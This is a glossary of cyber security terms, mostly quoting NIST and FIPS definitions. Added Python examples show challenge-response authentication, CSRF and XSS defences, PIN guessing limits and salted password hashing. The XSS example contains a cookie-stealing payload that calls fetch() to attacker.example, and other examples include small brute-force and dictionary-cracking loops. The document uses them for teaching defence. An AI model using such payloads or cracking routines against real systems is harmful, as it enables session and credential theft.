Cyber Dictionary – A Glossary of Common Cyber Security Terminology
Cyber Dictionary collects the most common cyber security terms, defined wherever possible as they appear in well-known standards; the number in parentheses after a definition points to its source in the list at the end of the page. For more detailed explanations, click on the highlighted terms.
Alert: A notification triggered by an event. Alerts serve the purpose of warning of suspicious events that require further attention. (2)
Accreditation: The official management decision to authorize operation of an information system and to explicitly accept the risk to agency operations (including mission, functions, image, or reputation), agency assets, or individuals, based on the implementation of an agreed-upon set of security controls. (6)
Adaptive Authentication: A way of implementing 2 Factor Authentication (2FA) or Multi-Factor Authentication (MFA) in which the verifier calculates a risk level for each authentication attempt (for example from the device, network location and time of the request) and adapts its decision to that level, such as requiring an additional factor only when the risk is elevated.
Adequate Security: Security commensurate with the risk and magnitude of harm resulting from the loss, misuse, or unauthorized access to or modification of information. (7)
Advanced Persistent Threat (APT): An adversary that possesses sophisticated levels of expertise and significant resources which allow it to create opportunities to achieve its objectives by using multiple attack vectors (e.g., cyber, physical, and deception). These objectives typically include establishing and extending footholds within the information technology infrastructure of the targeted organizations for purposes of exfiltrating information, undermining or impeding critical aspects of a mission, program, or organization; or positioning itself to carry out these objectives in the future. The advanced persistent threat: (i) pursues its objectives repeatedly over an extended period of time; (ii) adapts to defenders’ efforts to resist it; and (iii) is determined to maintain the level of interaction needed to execute its objectives. (5)
Authentication: The process by which a subject proves the identity it claims (see Identification), by presenting credentials that are checked against those registered for that identity. See also 2 Factor Authentication (2FA), Multi-Factor Authentication (MFA), Adaptive Authentication, and Continuous Authentication. Other definitions:
- FIPS 200: Verifying the identity of a user, process, or device, often as a prerequisite to allowing access to resources in an information system. (6)
Authentication Protocol: A defined sequence of messages between a claimant and a verifier that demonstrates that the claimant has possession and control of one or more valid authenticators to establish their identity, and, optionally, demonstrates that the claimant is communicating with the intended verifier. (10)
Authenticator: Something the claimant possesses and controls (typically a cryptographic module or password) that is used to authenticate the claimant’s identity. (10)
Authenticity: The property that data originated from its purported source. (10)
Availability: Ensuring timely and reliable access to and use of information. (8)
Baiting: A social engineering technique that lures unsuspecting individuals with an attractive offer into giving highly confidential or personal information to the attackers. The bait must be something the victims believe to be useful to them.
Baselining: Monitoring resources to determine typical utilization patterns so that significant deviations can be detected. (2)
Biometrics: Automated recognition of individuals based on their biological and behavioral characteristics. (10)
Certification: A comprehensive assessment of the management, operational, and technical security controls in an information system, made in support of security accreditation, to determine the extent to which the controls are implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for the system. (6)
Challenge-Response Protocol: An authentication protocol where the verifier sends the claimant a challenge (usually a random value or nonce) that the claimant combines with a secret (such as by hashing the challenge and a shared secret together, or by applying a private key operation to the challenge) to generate a response that is sent to the verifier. The verifier can independently verify the response generated by the claimant (such as by recomputing the hash of the challenge and the shared secret and comparing to the response, or performing a public key operation on the response) and establish that the claimant possesses and controls the secret. (10)
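The following Python program is an added worked example, not text from the cited standard or the original page, of the shared-secret variant described above, built on HMAC-SHA256: the verifier issues a random single-use nonce, the claimant returns HMAC(secret, claimant_id || nonce), and the verifier recomputes the value and compares it in constant time. The shared secret, the claimant identifier "alice" and the Verifier / claimant_respond names are all constructed for the example. It also shows the two failure cases a practitioner cares about: a captured (nonce, response) pair that is replayed is refused because that challenge has already been consumed, and an impostor without the secret fails a fresh challenge.

```python
import hashlib
import hmac
import secrets

# Shared secret provisioned out of band (constructed for this example).
SHARED_SECRET = b"example-shared-secret-not-for-production"


class Verifier:
    """Issues one-time challenges and checks HMAC responses against them."""

    def __init__(self, secret: bytes):
        self._secret = secret
        self._outstanding = {}   # nonce -> claimant id it was issued to
        self._used = set()       # consumed nonces (a real verifier would also expire them)

    def challenge(self, claimant_id: str) -> bytes:
        # A fresh random nonce per run: unpredictable AND never repeated while
        # the key is in use, so a captured response is useless later.
        nonce = secrets.token_bytes(32)
        self._outstanding[nonce] = claimant_id
        return nonce

    def verify(self, claimant_id: str, nonce: bytes, response: bytes) -> bool:
        # Reject unknown, already-consumed, or misdirected challenges.
        if nonce in self._used or self._outstanding.get(nonce) != claimant_id:
            return False
        # Single use: consume the challenge whether or not the response is valid.
        del self._outstanding[nonce]
        self._used.add(nonce)
        expected = hmac.new(self._secret, claimant_id.encode() + nonce,
                            hashlib.sha256).digest()
        # Constant-time comparison: do not leak how many bytes matched.
        return hmac.compare_digest(expected, response)


def claimant_respond(secret: bytes, claimant_id: str, nonce: bytes) -> bytes:
    """The claimant proves possession of the secret without ever transmitting it.
    Binding its own identifier into the MAC input stops a reflected response
    from being accepted for a different identity."""
    return hmac.new(secret, claimant_id.encode() + nonce, hashlib.sha256).digest()


def run_protocol(verifier: Verifier, claimant_secret: bytes, claimant_id: str = "alice"):
    """One full exchange; returns (nonce, response, accepted)."""
    nonce = verifier.challenge(claimant_id)                              # verifier -> claimant
    response = claimant_respond(claimant_secret, claimant_id, nonce)     # claimant -> verifier
    return nonce, response, verifier.verify(claimant_id, nonce, response)


def demo():
    verifier = Verifier(SHARED_SECRET)

    # 1. Legitimate claimant holding the shared secret is accepted.
    nonce, response, accepted = run_protocol(verifier, SHARED_SECRET)

    # 2. An eavesdropper replays the captured (nonce, response): rejected,
    #    because that challenge has already been consumed.
    replayed = verifier.verify("alice", nonce, response)

    # 3. An impostor without the secret answers a fresh challenge: rejected.
    _, _, impostor = run_protocol(verifier, b"wrong-secret")

    return accepted, replayed, impostor
```

A public-key variant replaces the HMAC with a signature over the nonce, so the verifier holds nothing that could be stolen and used to impersonate the claimant.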
Claimant: A subject whose identity is to be verified using one or more authentication protocols. (10)
Common Vulnerabilities and Exposures (CVE): A dictionary of common identifiers for publicly known cyber security vulnerabilities and exposures. Each CVE record consists of three parts: a CVE ID (of the form CVE-YYYY-NNNNN, the year of assignment followed by four or more digits), a description, and references.
Confidentiality: Preserving authorized restrictions on information access and disclosure, including means for protecting personal privacy and proprietary information. (8)
Continuous Authentication: Confirming the identity of a subject or user on an ongoing basis rather than making a single authentication check at login. In other words, the authentication mechanism continues to verify the identity of the user throughout the session.
Cross-Site Request Forgery (CSRF): An attack in which a user who is authenticated to a website (whose browser holds a valid session cookie for it) is lured to an attacker-controlled page that silently issues requests to that website, for example by auto-submitting a form. Because the browser attaches the session cookie to those requests automatically, the website executes the attacker's chosen actions as if the user had performed them. The victim's session only needs to be valid; it does not have to be open in another window.
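An added example in Python, not from the original page, of the vulnerable and the protected version of a state-changing request handler. The bank, the accounts, the Session / Request classes and the /transfer path are constructed stand-ins; the protection shown is the synchronizer-token pattern: a random per-session token is embedded in the site's own forms, and the handler refuses any POST that does not carry it.

```python
import hmac
import secrets
from dataclasses import dataclass, field


@dataclass
class Session:
    user: str
    # Per-session anti-CSRF token: random, unguessable, and never put in a cookie
    # (a cookie would be attached automatically, defeating the point).
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    """Constructed stand-in for an HTTP request as the server sees it."""
    method: str
    path: str
    cookies: dict
    form: dict


SESSIONS: dict = {}
BALANCES: dict = {"alice": 100}


def login(user: str) -> str:
    """Creates a session and returns the cookie value the browser will store."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = Session(user)
    return sid


def csrf_hidden_field(sid: str) -> str:
    """The genuine site embeds the token in its own form. A page on another origin
    cannot read this response, so it cannot learn the token."""
    return f'<input type="hidden" name="csrf_token" value="{SESSIONS[sid].csrf_token}">'


def transfer_vulnerable(req: Request) -> int:
    """Authorizes on the session cookie alone. The browser attaches that cookie to a
    POST from any origin, so an attacker's page can make alice's browser send it."""
    session = SESSIONS.get(req.cookies.get("sid"))
    if session is None:
        return 401
    BALANCES[session.user] -= int(req.form["amount"])
    return 200


def transfer_protected(req: Request) -> int:
    """Synchronizer-token check: the request must carry the token bound to this session."""
    session = SESSIONS.get(req.cookies.get("sid"))
    if session is None:
        return 401
    submitted = req.form.get("csrf_token", "")
    if not hmac.compare_digest(submitted.encode(), session.csrf_token.encode()):
        return 403            # reject before any state change
    BALANCES[session.user] -= int(req.form["amount"])
    return 200


def demo() -> dict:
    BALANCES["alice"] = 100
    sid = login("alice")

    # Alice's browser, lured to attacker.example, auto-submits this form to the bank.
    # The browser adds her "sid" cookie; the attacker has no way to learn her token.
    forged = Request("POST", "/transfer", cookies={"sid": sid},
                     form={"amount": "50", "to": "attacker"})
    vulnerable_status = transfer_vulnerable(forged)      # 200: balance 100 -> 50
    balance_after_vulnerable = BALANCES["alice"]
    protected_status = transfer_protected(forged)        # 403: balance unchanged

    # A request from the site's own form includes the hidden token and succeeds.
    genuine = Request("POST", "/transfer", cookies={"sid": sid},
                      form={"amount": "10", "to": "bob",
                            "csrf_token": SESSIONS[sid].csrf_token})
    genuine_status = transfer_protected(genuine)         # 200: balance 50 -> 40
    return {
        "vulnerable_status": vulnerable_status,
        "balance_after_vulnerable": balance_after_vulnerable,
        "protected_status": protected_status,
        "genuine_status": genuine_status,
        "final_balance": BALANCES["alice"],
    }
```

As defence in depth, mark the session cookie SameSite=Lax or Strict and check the Origin header on state-changing requests; and never let a GET change state, since the token check above only guards the POST path.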
Cross-Site Scripting (XSS): A vulnerability that allows attackers to inject malicious code into an otherwise benign website. These scripts acquire the permissions of scripts generated by the target website and can therefore compromise the confidentiality and integrity of data transfers between the website and client. Websites are vulnerable if they display user-supplied data from requests or forms without sanitizing the data so that it is not executable. (10)
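The following Python snippet is an added example, not from the cited standard or the page, of the last sentence of the XSS definition: the same reflected search term rendered without and with escaping, in both the HTML body context and an attribute context. The payloads, the attacker.example host and the render_* function names are constructed for the example; html.escape is the standard-library function used for the safe versions.

```python
import html

# Constructed attacker payloads: a body-context script injection and an
# attribute-context breakout that adds an event handler.
BODY_PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
ATTR_PAYLOAD = '" onfocus="alert(1)" autofocus="'


def render_vulnerable(term: str) -> str:
    """Reflects the query string straight into the page. The browser parses the
    payload as markup, and the script runs with the site's origin and cookies."""
    return f"<p>Results for: {term}</p>"


def render_escaped(term: str) -> str:
    """HTML body context: escape & < > " ' so the browser renders the input as text."""
    return f"<p>Results for: {html.escape(term, quote=True)}</p>"


def render_attribute_escaped(term: str) -> str:
    """Attribute context: the value must be quoted AND the quotes escaped,
    otherwise the payload closes the attribute and injects an event handler."""
    return f'<input name="q" value="{html.escape(term, quote=True)}">'


def contains_live_markup(rendered: str) -> bool:
    """Crude check used by the demo: is a raw tag or attribute handler still present?"""
    lowered = rendered.lower()
    return "<script" in lowered or '" onfocus=' in lowered


def demo() -> dict:
    return {
        "body_vulnerable_executes": contains_live_markup(render_vulnerable(BODY_PAYLOAD)),        # True
        "body_escaped_executes": contains_live_markup(render_escaped(BODY_PAYLOAD)),              # False
        "attr_vulnerable_executes": contains_live_markup(f'<input value="{ATTR_PAYLOAD}">'),      # True
        "attr_escaped_executes": contains_live_markup(render_attribute_escaped(ATTR_PAYLOAD)),    # False
        "escaped_output": render_escaped(BODY_PAYLOAD),
    }
```

Escaping is context-specific: HTML escaping is not sufficient for data placed inside a script block, a URL, or a CSS value, each of which needs its own encoding, and a Content-Security-Policy header limits the damage when an escape is missed.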
Cryptographic Key: A value used to control cryptographic operations, such as decryption, encryption, signature generation, or signature verification. (10)
Cyber Security: Protection of the confidentiality, integrity and availability of information, whether in transit, in processing or at rest, and of the underlying information systems (both hardware and software), in cyberspace where people, processes and technology are involved, through the application of policy, training and awareness, and technology. See also Information Security.
Digital Signature: An asymmetric key operation where the private key is used to digitally sign data and the public key is used to verify the signature. Digital signatures provide authenticity protection, integrity protection, and non-repudiation, but not confidentiality protection. (10)
Drive-by-Download Attack: An attack that takes advantage of security flaws in an application, web browser or operating system to install malware on a user's machine without the user's knowledge or interaction, simply upon visiting a malicious or compromised website.
Eavesdropping Attack: (In the context of authentication) An attack in which an attacker listens passively to the authentication protocol to capture information that can be used in a subsequent active attack to masquerade as the claimant. (10)
Entropy: A measure of the amount of uncertainty an attacker faces to determine the value of a secret. Entropy is usually stated in bits. A value having n bits of entropy has the same degree of uncertainty as a uniformly distributed n-bit random value. (10)
Event: Any observable occurrence that results in a change of state in a network or system. (2)
Federal Information Processing Standard (FIPS): Under the Information Technology Management Reform Act, the National Institute of Standards and Technology (NIST) develops standards and guidelines that are issued as Federal Information Processing Standards (FIPS) and approved by the Secretary of Commerce. FIPS documents are available online at: http://www.nist.gov/itl/fips.cfm
Hash Function: A function that maps a bit string of arbitrary length to a fixed-length bit string. Approved hash functions satisfy the following properties: (10)
- One-Way: It is computationally infeasible to find any input that maps to any pre-specified output.
- Collision Resistant: It is computationally infeasible to find any two distinct inputs that map to the same output.
Identification: A subject's claim of an identity (for example by presenting a username), which authentication then verifies.
Identity: An attribute or set of attributes that uniquely describe a subject within a given context. (10)
Incident: An event that violates computer security policies, acceptable use policies or security standards and that has unwanted consequences. (2) Other definitions:
- FIPS 200: An occurrence that actually or potentially jeopardizes the confidentiality, integrity, or availability of an information system or the information system processes, stores, or transmits or that constitutes a violation or imminent threat of violation of security policies, security procedures, or acceptable use policies. (6)
Incident Handling: See Incident Response.
Incident Response: A structured methodology for detecting and analyzing incidents and taking security actions and/or applying appropriate controls to mitigate the unwanted effects resulting from the incident. (2)
Information Security: The protection of information and information systems from unauthorized access, use, disclosure, disruption, modification, or destruction in order to provide confidentiality, integrity, and availability. (8)
Integrity: Guarding against improper information modification or destruction, and includes ensuring information non-repudiation and authenticity. (8)
Malware: Malicious software of any kind, designed to harm or exploit a programmable device or network. Types of malware include viruses, worms, Trojan horses, rootkits, ransomware, bots, adware, spyware, etc.
Management Controls: The security controls (i.e., safeguards or countermeasures) for an information system that focus on the management of risk and the management of information system security. (6)
Man-in-the-Middle Attack (MitM): An attack in which an attacker is positioned between two communicating parties in order to intercept and/or alter data traveling between them. In the context of authentication, the attacker would be between claimant and verifier. (10)
Memorized Secret: A type of authenticator comprised of a character string intended to be memorized or memorable by the subscriber, permitting the subscriber to demonstrate something they know as part of an authentication process. (10)
Message Authentication Code (MAC): A cryptographic checksum on data that uses a symmetric key to detect both accidental and intentional modifications of the data. MACs provide authenticity and integrity protection, but not non-repudiation protection. (10)
Multi-Factor Authentication (MFA): Proving a claimed identity by using two or more authentication factors from different categories (something you know, something you have, something you are) in one authentication mechanism. In other words, if an authentication system requires at least two different credentials that fall into different authentication categories, it is multi-factor authentication; two credentials of the same category, such as a password plus a security question, are not. Other definitions:
- NIST SP 800-63-3: An authentication system that requires more than one distinct authentication factor for successful authentication. MFA can be performed using a single authenticator or by a combination of authenticators that provide different factors. The three authentication factors are something you know, something you have, and something you are. (10)
Nonce: A value used in security protocols that is never repeated with the same key. For example, nonces used as challenges in challenge-response authentication protocols SHALL not be repeated until authentication keys are changed. Otherwise, there is a possibility of a replay attack. Using a nonce as a challenge is a different requirement than a random challenge, because a nonce is not necessarily unpredictable. (10)
Offline Attack: An attack where the attacker obtains some data (typically by eavesdropping on an authentication protocol run or by penetrating a system and stealing security files) that he/she is able to analyze in a system of his/her own choosing. (10)
Online Attack: An attack against an authentication protocol where the attacker either assumes the role of a claimant with a genuine verifier or actively alters the authentication channel. (10)
Online Guessing Attack: An attack in which an attacker performs repeated logon trials by guessing possible values of the authenticator output. (10)
Operational Controls: The security controls (i.e., safeguards or countermeasures) for an information system that primarily are implemented and executed by people (as opposed to systems.) (6)
Passive Attack: An attack against an authentication protocol, where the attacker intercepts data traveling along the network between the claimant and verifier, but does not alter the data (i.e., eavesdropping). (10)
Passphrase: A passphrase is a memorized secret consisting of a sequence of words or other text that a claimant uses to authenticate their identity. A passphrase is similar to a password in usage, but is generally longer for added security. (10)
Password: See Memorized Secret.
Personal Identification Number (PIN): A memorized secret typically consisting of only decimal digits. (10)
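The following Python program is an added example, not from the cited standards or the page, that puts numbers on the Entropy, Online Guessing Attack and PIN entries above: it computes the entropy of a uniformly chosen secret, the attacker's success probability under a given attempt budget, and then runs an online guessing attack against a constructed verifier with and without a failed-attempt limit. The PIN "4271", the ThrottledVerifier class and the limit of 100 failures are constructed for the example.

```python
import hmac
import math
from typing import Optional


def entropy_bits(alphabet_size: int, length: int) -> float:
    """Entropy of a secret chosen uniformly at random from alphabet_size ** length values.
    A 4-digit PIN: 4 * log2(10) = 13.29 bits. A 6-word passphrase from a
    7776-word list: 6 * log2(7776) = 77.5 bits."""
    return length * math.log2(alphabet_size)


def guess_success_probability(bits: float, attempts: int) -> float:
    """Chance that `attempts` distinct guesses hit a uniformly random secret of `bits` entropy."""
    return min(1.0, attempts / 2 ** bits)


class ThrottledVerifier:
    """Verifier for a memorized secret with a per-account failed-attempt limit.
    max_failures=None models an unthrottled verifier (the vulnerable case)."""

    def __init__(self, secret: str, max_failures: Optional[int]):
        self._secret = secret
        self._max_failures = max_failures
        self.failures = 0

    def check(self, guess: str) -> bool:
        if self._max_failures is not None and self.failures >= self._max_failures:
            return False          # locked: must be unlocked out of band, even for the right PIN
        if hmac.compare_digest(guess.encode(), self._secret.encode()):
            return True
        self.failures += 1
        return False


def online_guessing_attack(verifier: ThrottledVerifier, digits: int = 4) -> Optional[str]:
    """Attacker submits every PIN in order to the live verifier; returns the PIN if accepted."""
    for n in range(10 ** digits):
        guess = f"{n:0{digits}d}"
        if verifier.check(guess):
            return guess
    return None


def demo() -> dict:
    pin = "4271"   # constructed secret
    unthrottled = ThrottledVerifier(pin, max_failures=None)
    throttled = ThrottledVerifier(pin, max_failures=100)
    bits = entropy_bits(10, 4)
    return {
        "pin_entropy_bits": round(bits, 2),                                 # 13.29
        "p_success_100_attempts": guess_success_probability(bits, 100),     # 0.01
        "unthrottled_result": online_guessing_attack(unthrottled),          # "4271"
        "unthrottled_attempts": unthrottled.failures + 1,                   # 4272
        "throttled_result": online_guessing_attack(throttled),              # None
        "throttled_failures": throttled.failures,                           # 100 then locked
    }
```

The point of the comparison is that 13 bits of entropy is plenty for a PIN as long as the verifier caps online attempts (here to a 1% success chance), but hopeless against an offline attack, which is why a PIN must only ever be checked by a verifier or device that can enforce such a limit.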
Personally Identifiable Information (PII): Information that can be used to distinguish or trace an individual’s identity, either alone or when combined with other information that is linked or linkable to a specific individual. (7)
Phishing: An attack in which the subscriber is lured (usually through an email) to interact with a counterfeit verifier and tricked into revealing information that can be used to masquerade as that subscriber to the real verifier. (10)
Presentation Attack: Presentation to the biometric data capture system with the goal of interfering with the operation of the biometric system. (10)
Pretexting: A social engineering technique that involves creating a fake identity and a story, i.e., a pretext, to manipulate victims into providing sensitive information or making security mistakes.
Private Key: The secret part of an asymmetric key pair that is used to digitally sign or decrypt data. (10)
Pseudonym: A name other than a legal name. (10)
Public Key: The public part of an asymmetric key pair that is used to verify signatures or encrypt data. (10)
Public Key Certificate: A digital document issued and digitally signed by the private key of a certificate authority that binds an identifier to a subscriber to a public key. The certificate indicates that the subscriber identified in the certificate has sole control and access to the private key. (10)
Public Key Infrastructure (PKI): A set of policies, processes, server platforms, software, and workstations used for the purpose of administering certificates and public-private key pairs, including the ability to issue, maintain, and revoke public key certificates. (10)
Replay Attack: An attack in which the attacker is able to replay previously captured messages (between a legitimate claimant and a verifier) to masquerade as that claimant to the verifier or vice versa. (10)
Risk: The level of impact on organizational operations (including mission, functions, image, or reputation), organizational assets, or individuals resulting from the operation of an information system given the potential impact of a threat and the likelihood of that threat occurring. (6)
Risk Management: The process of managing risks to organizational operations (including mission, functions, image, or reputation), organizational assets, or individuals resulting from the operation of an information system, and includes: (i) the conduct of a risk assessment; (ii) the implementation of a risk mitigation strategy; and (iii) employment of techniques and procedures for the continuous monitoring of the security state of the information system. (6)
Safeguards: Protective measures prescribed to meet the security requirements (i.e., confidentiality, integrity, and availability) specified for an information system. Safeguards may include security features, management constraints, personnel security, and security of physical structures, areas, and devices. (6)
Salt: A non-secret value used in a cryptographic process, usually to ensure that the results of computations for one instance cannot be reused by an attacker. (10)
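An added Python example, not from the cited standard or the page, tying together the Hash Function, Memorized Secret, Offline Attack and Salt entries: passwords stored as a single unsalted SHA-256 beside passwords stored with PBKDF2-HMAC-SHA256 and a random per-record salt, and the offline dictionary attack an adversary runs against each after stealing the database. The user names, passwords, word list, iteration counts and function names are all constructed for the example; hashlib.pbkdf2_hmac is the standard-library function used.

```python
import hashlib
import hmac
import secrets
from typing import Optional

# Work factor for PBKDF2-HMAC-SHA256. Tune it so one verification costs tens of
# milliseconds on the verifier; the demo below passes a smaller value for speed.
DEFAULT_ITERATIONS = 600_000


def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = DEFAULT_ITERATIONS) -> str:
    """Salted, iterated hash. The salt is random per record and stored in the clear;
    its job is to make every record's computation unique, not to be secret."""
    salt = salt if salt is not None else secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    _algo, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def unsalted_sha256(password: str) -> str:
    """The weak scheme: one fast hash, no salt."""
    return hashlib.sha256(password.encode()).hexdigest()


def crack_unsalted(stolen: dict, wordlist: list) -> tuple:
    """Offline attack on unsalted hashes: one precomputed table serves every stolen
    record, so the work is len(wordlist) fast hashes regardless of the user count."""
    table = {unsalted_sha256(w): w for w in wordlist}
    found = {user: table[h] for user, h in stolen.items() if h in table}
    return found, len(wordlist)


def crack_salted(stolen: dict, wordlist: list) -> tuple:
    """Offline attack on salted hashes: the salt differs per record, so every candidate
    must be rehashed for every user, and each rehash costs `iterations` HMAC calls."""
    found, work = {}, 0
    for user, stored in stolen.items():
        for candidate in wordlist:
            work += 1
            if verify_password(candidate, stored):
                found[user] = candidate
                break
    return found, work


def demo(iterations: int = 2_000) -> dict:
    # Constructed "stolen database": alice and bob chose the same weak password.
    passwords = {"alice": "winter2024", "bob": "winter2024", "carol": "Tr0ub4dor&3"}
    wordlist = ["password", "123456", "winter2024", "letmein"]   # constructed attacker list

    unsalted_db = {u: unsalted_sha256(p) for u, p in passwords.items()}
    salted_db = {u: hash_password(p, iterations=iterations) for u, p in passwords.items()}

    unsalted_found, unsalted_work = crack_unsalted(unsalted_db, wordlist)
    salted_found, salted_work = crack_salted(salted_db, wordlist)
    return {
        # Unsalted: identical passwords are visible as identical hashes before any cracking.
        "unsalted_identical": unsalted_db["alice"] == unsalted_db["bob"],   # True
        "salted_identical": salted_db["alice"] == salted_db["bob"],         # False
        "unsalted_found": unsalted_found, "unsalted_work": unsalted_work,   # 4 hashes total
        "salted_found": salted_found, "salted_work": salted_work,           # 10 PBKDF2 runs
    }
```

The salt does not stop the weak passwords from being found; it removes the attacker's ability to amortize work across users and across breaches, and the iteration count makes each remaining guess expensive.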
Sanitization: Process to remove information from media such that information recovery is not possible. It includes removing all labels, markings, and activity logs. (6)
Security Controls: The management, operational, and technical controls (i.e., safeguards or countermeasures) prescribed for an information system to protect the confidentiality, integrity, and availability of the system and its information. (9)
Security Control Baseline: The set of minimum security controls defined for a low-impact, moderate-impact, or high-impact information system. (6)
Session Hijack Attack: An attack in which the attacker is able to insert himself or herself between a claimant and a verifier subsequent to a successful authentication exchange between the latter two parties. The attacker is able to pose as a subscriber to the verifier or vice versa to control session data exchange. (10)
Shoulder Surfing: A social engineering technique that involves looking over the shoulder of an individual to read sensitive information from the computer's screen, or watching the keyboard as the user types in order to capture the user's access credentials.
Side-Channel Attack: An attack enabled by leakage of information from a physical crypto system. Characteristics that could be exploited in a side-channel attack include timing, power consumption, and electromagnetic and acoustic emissions. (10)
Server Message Block (SMB): An application layer protocol that allows for file, printer, device sharing and inter-process communication (IPC) between applications on a network through a client-server architecture. To put it differently, computers (SMB clients) on a network can connect to SMB servers to access shared files and directories or perform tasks like printing over the network.
Spear Phishing: A form of phishing attack that targets specific individuals, rather than the general public with mass phishing email.
Subject: A person, organization, device, hardware, network, software, or service. (10)
Symmetric Key: A cryptographic key used to perform both the cryptographic operation and its inverse. For example, to encrypt and decrypt or create a message authentication code and to verify the code. (10)
Tailgating: A social engineering technique that lets attackers gain access to facilities that require access permissions, either by following closely behind individuals with access authorization or by tricking authorized personnel into helping the attackers get into the facility.
Technical Controls: The security controls (i.e., safeguards or countermeasures) for an information system that primarily are implemented and executed by the information system through mechanisms contained in the hardware, software, or firmware components of the system. (6)
Threat: Any circumstance or event with the potential to adversely impact organizational operations (including mission, functions, image, or reputation), organizational assets, individuals, other organizations, or the Nation through an information system via unauthorized access, destruction, disclosure, modification of information, and/or denial of service. (5) See also Advanced Persistent Threat (APT).
Threat Source: The intent and method targeted at the intentional exploitation of a vulnerability or a situation and method that may accidentally trigger a vulnerability. (6)
Transport Layer Security (TLS): An authentication and security protocol widely implemented in browsers and web servers. TLS 1.2 is defined by RFC 5246. (10) The current version, TLS 1.3, is defined by RFC 8446.
Usability: Extent to which a product can be used by specified users to achieve specified goals with effectiveness, efficiency, and satisfaction in a specified context of use. (11)
Verifier: An entity that verifies the claimant's identity by verifying the claimant's possession and control of one or two authenticators using an authentication protocol. (10)
Vishing: A term that combines “voice” and “phishing” to describe a social engineering technique that involves using phone calls or voice messages to steal or capture sensitive information from the victims. In vishing attacks, attackers usually impersonate other individuals such as superiors, help desk personnel etc. or spoof institutions such as banks or financial institutions.
Vulnerability: A flaw or weakness in a system that could be exploited by a threat vector and lets the adversary bypass the implemented protection mechanisms with respect to confidentiality, integrity and availability. Vulnerabilities can allow attackers to gain unauthorized access to resources, steal, modify or destroy data, install malware etc. Other definitions:
- National Institute of Standards and Technology (NIST): A flaw or weakness in system security procedures, design, implementation, or internal controls that could be exercised (accidentally triggered or intentionally exploited) and result in a security breach or a violation of the system’s security policy. (3)
- ISO 27005: A weakness on an asset or group of assets that can be exploited by one or more threats, where an asset is anything that has value to the organization, its business operations and their continuity, including information resources that support the organization’s mission.
- IETF RFC 4949: A flaw or weakness in a system’s design, implementation, or operation and management that could be exploited to violate the system’s security policy.
- European Union Agency for Cybersecurity (ENISA): The existence of a weakness, design, or implementation error that can lead to an unexpected, undesirable event compromising the security of the computer system, network, application, or protocol involved.
Watering Hole: A social engineering technique in which a legitimate and commonly visited website is infected by attackers in order to install malware on the visitors’ machines automatically or trick the targeted users into downloading and launching the malicious code from the compromised website.
Whaling: A form of spear phishing attack that specifically targets high-profile individuals such as senior employees, high-level executives or individuals with privileged access to systems, such as system and network administrators.
Zeroize: Overwrite a memory location with data consisting entirely of bits with the value zero so that the data is destroyed and not recoverable. This is often contrasted with deletion methods that merely destroy reference to data within a file system rather than the data itself. (10)
Zero-Knowledge Password Protocol: A password-based authentication protocol that allows a claimant to authenticate to a verifier without revealing the password to the verifier. Examples of such protocols are EKE, SPEKE and SRP. (10)
2 Factor Authentication (2FA): A method of confirming a subject's identity through a combination of exactly two authentication factors from different categories, such as something you know and something you have, or something you have and something you are. 2FA is a special case of Multi-Factor Authentication (MFA).
"If you think you know-it-all about cybersecurity, this discipline was probably ill-explained to you." - Stephane Nappo
References (cited by number in the definitions above):
- (1) NIST Computer Security Resource Center Glossary
- (2) NIST SP 800-61 Rev. 2, Computer Security Incident Handling Guide
- (3) NIST SP 800-53 Rev. 5, Security and Privacy Controls for Information Systems and Organizations
- (4) NIST SP 800-30 Rev. 1, Guide for Conducting Risk Assessments
- (5) NIST SP 800-39, Managing Information Security Risk
- (6) FIPS PUB 200, Minimum Security Requirements for Federal Information and Information Systems
- (7) OMB Circular A-130, Appendix III, Security of Federal Information Resources
- (8) 44 U.S.C., Sec. 3542, Definitions
- (9) FIPS PUB 199, Standards for Security Categorization of Federal Information and Information Systems
- (10) NIST SP 800-63-3, Digital Identity Guidelines
- (11) ISO/IEC 9241-11, Ergonomic Requirements for Office Work with Visual Display Terminals (VDTs) – Part 11: Guidance on Usability